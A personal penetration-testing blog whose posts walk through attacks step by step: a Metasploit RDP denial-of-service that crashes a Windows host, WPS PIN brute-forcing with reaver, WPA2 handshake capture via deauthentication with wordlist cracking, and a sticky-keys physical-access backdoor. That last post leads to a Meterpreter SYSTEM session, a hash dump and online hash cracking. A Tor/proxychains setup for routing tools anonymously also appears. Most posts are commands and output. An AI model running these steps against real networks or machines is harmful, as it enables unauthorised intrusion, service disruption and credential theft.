owaspbwa – web testing fast-track

20 09 2013

WOW – has it really been since January !!!??? – time flies when you are having fun.

Just wanted to share a nice little project I came across when looking for vulnerable web apps etc.

Many many thanks to Mandiant for sponsoring the bundling of so many of these into the one VM. Means you dont have to spend the day setting up each one before you can start playing with them.



All the favorites are there, as well as plenty I hadn’t seen before.


Applications designed for learning which guide the user to specific, intentional vulnerabilities.


One tip though, if you download the 1.1 VM, make sure you replace the tomcat init script as identified in this BR: https://code.google.com/p/owaspbwa/issues/detail?id=83 otherwise anything that relies on tomcat (WebGoat etc) wont work & instead just give you the following warning:

503 - Service Temporarily Unavailable

Tor & disabling IPv6 in Linux

23 06 2012

Install & configure tor / privoxy & proxychains

– Add a new repo

vi /etc/apt/sources.list

deb http://deb.torproject.org/torproject.org lucid main

– Get the key

gpg –keyserver keys.gnupg.net –recv 886DDD89
gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add –

– Installapt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy

– Check privoxy config to make sure listen address is & configure socks4a proxy

vi /etc/privoxy/config

forward-socks4a / .

– change keep-alive-timeout & socket-timeout to 600

keep-alive-timeout 600
socket-timeout 600

– Start privoxy

/etc/init.d/privoxy start

– Change your browser to point @ your proxy
– Check that you connect over tor


– Next up, install proxychains so you can use other tools over tor

apt-get install proxychains

– Verify the following line is in /etc/proxychains.conf

socks4 9050

– Remove tor & privoxy from startup (init when you need them)

update-rc.d -f tor remove
update-rc.d -f privoxy remove

– Start them up

service tor start
service privoxy start

– Check its working – “proxychains <command>”

root@bt:~# netstat -antp | grep LISTEN
tcp        0      0*               LISTEN      3569/privoxy
tcp        0      0*               LISTEN      3562/tor

root@bt:~# curl -s icanhazip.com

root@bt:~# proxychains curl -s icanhazip.com
|S-chain|-<>-<><>-<><>-OK Have fun, then shut em down when you are done

service privoxy stop
service tor stop

– There are many reasons you may not want IPv6 running on your machine (for example if you were using tor & didnt want IPv6 traffic to go directly to a target instead of via your IPv4 socks proxy)

root@bt:~# vi /etc/sysctl.conf

#disable ipv6
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

root@bt:~# sysctl -p

MS12-020 Metasploit Fun

25 03 2012

Metasploit contains a module to DoS Windows hosts with RDP enabled using the PoC code – patched in MS12-020

Well, it works 😀 – short & sweet….

The only known code in the wild is for DoS – so far no remote code execution – but one step generally leads to the other pretty quickly – so disable / patch / protect your RDP ASAP.

Now you see it:

root@bt:~/vpn/darknet# nmap -p 3389

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-25 17:51 EST
Nmap scan report for
Host is up (0.0035s latency).
3389/tcp open ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

64 bytes from icmp_seq=99 ttl=127 time=2.90 ms
64 bytes from icmp_seq=100 ttl=127 time=4.13 ms
64 bytes from icmp_seq=101 ttl=127 time=2.85 ms

Now you dont:

root@bt:/opt/metasploit/msf3# ./msfconsole
msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > set RHOST
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] – 210 bytes sent
[*] – Checking RDP status…
[+] seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

From icmp_seq=131 Destination Host Unreachable
From icmp_seq=132 Destination Host Unreachable
From icmp_seq=133 Destination Host Unreachable

w00t BSOD !! – DoS (Crashdump & Reboot)

identify & crack your WPS enabled AP

25 01 2012

##DISCLAIMER## – as usual, only use on devices you have approval for or own.

I hadn’t looked much at reaver yet – although had been following the news since it was released in Dec. Reaver allows you to brute force the WPS 8 numeric digit pin (easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers to get certification.

Main tools:
– reaver (crack AP) & wash (identify AP vuln to WPS brute forcing)
– the python script wpscan.py (circa 2009) allows you to fingerprint the AP (Make / Model / Serial etc) that has WPS enabled

Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash



Do the install dance on your distro (works on BT5r1)

# tar zxvf reaver-1.4.tar.gz
# ./config
# make
# make install

You can also use a fun little python script called wpscan.py (not to be confused with the WordPress tool) to fingerprint the AP


Step 1: Interface into monitor mode

# airmon-ng start wlan0

Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver

# wash –i mon0

Step 3: Fingerprint with wpscan.py

# ./wpscan.py –i mon0

Step 4: run reaver against it …… grab a coffee / lunch / sleep – can take several hours to brute force the WPS pin

# reaver -i mon0 -b -AP MAC ADDRESS- -v

This will [should] result in returning the pin & psk of the wifi router – you can simply then connect.

WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’

WPA2 network cracking

27 09 2011

So – everyone has cracked WEP & everyone knows it has a couple of seconds security around it.

This time I am getting connected to a WPA2 / PSK protected network.

Couple of things you will need

  • Backtrack (I am using 5r1 )
  • A wordlist – google is your friend here but there is a 3169 word list at /pentest/passwords/john/password.lst to get you started
  • A wireless card
  • A WPA or WPA2 network protected with a pre-shared key (your own of course)

==Drop the interface into monitor mode==

root@bt:~# airmon-ng start wlan0

Interface    Chipset        Driver

wlan0        Zydas zd1211    zd1211rw - [phy1]
(monitor mode enabled on mon0)

==Find your target wireless network==

root@bt:~# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 38:E7:D8:AD:B2:0E    0       61        0    0  11  54e  WPA2 CCMP   PSK  Wireless

==Start capturing==

root@bt:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                           

 38:E7:D8:AD:B2:0E    0 100     4319       83    0  11  54e  WPA2 CCMP   PSK  Wireless                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                    

 38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0    1 -48      0       81  Wireless

So now that you are capturing the traffic, we can either wait for a user to connect, or deauth an existing one….

==Deauth an existing user to get the 4 way handshake==

root@bt:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49  Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50  Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]

Once the user is connected, you see the WPA handshake in the top right corner

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E    0  96      807       28    0  11  54e  WPA2 CCMP   PSK  Wireless

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0   54 - 6      0      161

Now, the best bit of this over WEP cracking is that we no longer need to be anywhere near the network. The cracking is done offline.

==The easy way (No garuntee this will work)==

There are two ways to tackle this – at the end of the day, you need to brute force the password, but having a decent wordlist gives you a huge advantage over a,b,c,d 1,2,3,4 etc.

This is the secret sauce – without a decent wordlist, you got nothing.

For this example we will just use the one that comes with JTR in BT

root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:00] 48 keys tested (489.60 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 

BOOHYA – our WPA2 PSK is sunshine

==The hard way (but will EVENTUALLY find it)==

root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:22] 11484 keys tested (534.50 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 

So thats it … no smoke … no mirrors … Get the capture of a handshake, then brute force the key from it 😀

Remember this the next time you are thinking of a PSK for your wireless router.

A good page to read about password strength & get a feel for what it takes to brute force different passwords is the Password Haystacks page by Steve Gibson (grc.com)

60seconds of physical access = p0wn3d windows machine

27 09 2010

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Stickey keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, backup the original file and copy in cmd.exe

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 time and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] Request received for /Arf3V...
[*] Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] Request received for /Brf3V...
[*] Stage connection for target rf3V received...
[*] Meterpreter session 2 opened ( -> at 2010-09-27 21:35:10
[*] Session ID 2 ( -> processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  :
Netmask     :

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  :
Netmask     :

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.

Information Security – By Offensive Security

5 09 2010

One stop infosec shop – the Offensive Security guys have thrown a whole bunch of juicy links together in one place – its worth a look:

The Future of Information Security – Offensive Security

Information Security is a vast and deep realm with many facets. Often, companies find themselves confused trying to find quality training, effective awareness programs or more meaningful certifications. In the end, many are left searching Google trying to find answers.

Offensive Security has has put together a set of resources to help your company in its mission to become more secure. Our mission statement is – “Security Through Education“. To us that is not just a statement, it is a way of life. Below is a list of resources that are at your disposal to give you some of the best security based education in the world today.

via Information Security – By Offensive Security.